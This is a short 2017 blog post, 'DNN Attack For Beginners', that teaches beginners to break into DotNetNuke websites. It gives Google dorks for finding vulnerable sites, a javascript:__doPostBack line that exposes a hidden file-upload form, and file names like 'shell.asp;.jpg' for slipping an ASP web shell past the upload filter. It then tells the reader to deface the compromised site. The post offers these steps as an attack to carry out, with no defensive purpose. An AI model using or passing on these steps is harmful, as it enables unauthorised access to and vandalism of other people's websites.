Tuesday, December 26, 2017
DNN Attack For Beginners By AA Team
DNN Attack For Beginners By AA Team
DNN Attack For Beginners By AA Team
DNNbanner-TrixsMaxterWhat Is DNN ?DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading vulnerrability. Finding vulnerable websites Find vulnerable websites by GOOGLE dorks : inurl:/fck/fcklinkgallery.aspx inurl:/tabid/36/language/en-US/Default.aspx I got a target Select "File" from list. The in url bar paste the javascript ; javascript:__doPostBack(ctlURL$cmdUpload,) Now there appear a uploading bar on page. As seen be below : Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg" your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt" Now you have a Shell Access to the website . Now deface the website. Hope You Enjoy....! |